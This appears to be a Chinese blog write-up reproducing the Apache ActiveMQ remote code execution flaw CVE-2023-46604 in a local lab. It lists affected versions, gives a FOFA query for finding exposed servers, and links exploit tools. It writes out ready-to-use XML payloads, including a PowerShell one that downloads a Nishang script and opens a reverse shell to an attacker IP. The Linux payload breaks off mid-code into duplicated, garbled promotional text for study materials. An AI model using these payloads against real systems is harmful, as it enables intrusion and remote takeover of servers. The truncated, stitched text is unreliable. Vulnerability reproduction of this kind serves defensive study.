【Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)】

前言

一、漏洞名称

二、漏洞描述

三、受影响端口

四、受影响版本

五、FOFA语法

六、本地复现

1、环境搭建

2、exp工具复现

七、修复建议

---

前言

近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞，故做一下漏洞复现记录。

---

一、漏洞名称

Apache ActiveMQ 远程代码执行漏洞

二、漏洞描述

Apache ActiveMQ 中存在远程代码执行漏洞，具有 Apache ActiveMQ 服务器TCP端口（默认为61616）访问权限的远程攻击者可以通过发送恶意数据到服务器从而执行任意代码。

三、受影响端口

61616

四、受影响版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

五、FOFA语法

app="APACHE-ActiveMQ" && port="61616"

六、本地复现

1、环境搭建

本地环境采用的是kali+win10系统做复现，漏洞环境安装部署在win10中。

ActiveMQ版本：5.17.4，Java环境为jdk11，需提前安装好。

win10 IP：192.168.78.174

kali IP: 192.168.78.128

下载好ActiveMQ后修改配置文件

进入bin目录下选择win64目录下的bat文件开启运行

可访问即可，默认账户密码：admin/admin

2、exp工具复现

工具地址：

https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp

https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

个人感觉下面这个好用点，我这里用下面这个吧

上面这个工具使用可参考这个博客：Apache ActiveMQ 远程代码执行漏洞复现（CNVD-2023-69477）-CSDN博客

工具下载好后利用很简单,首先准备好poc.xml

poc-dnslog

<?xml version="1.0" encoding="utf-8"?>
 
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> 
    <constructor-arg> 
      <list> 
        <value>ping</value>    
	<value>xxx.xxx.xxx.cn</value> 
      </list> 
    </constructor-arg> 
  </bean> 
</beans>

poc-win

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>powershell</value>
                <value>-c</value>
                <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.78.128 -Port 3333]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

poc-linux

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>bash</value>
## 最后

**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/0b53a6fce8cc16021ff170ec752a5239.png)

![img](https://img-blog.csdnimg.cn/img_convert/21cf6cfb55a1cfe828f0fc2163af2016.png)

![img](https://img-blog.csdnimg.cn/img_convert/f91e5d6fe8353279f629b8480d4bc6bd.png)

![img](https://img-blog.csdnimg.cn/img_convert/642c668de932c6c58d4db3926ce502b2.png)

![img](https://img-blog.csdnimg.cn/img_convert/832fcd07fc6b86f0d586a1f20c508e4a.png)

 

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**

白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！**

[**如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！**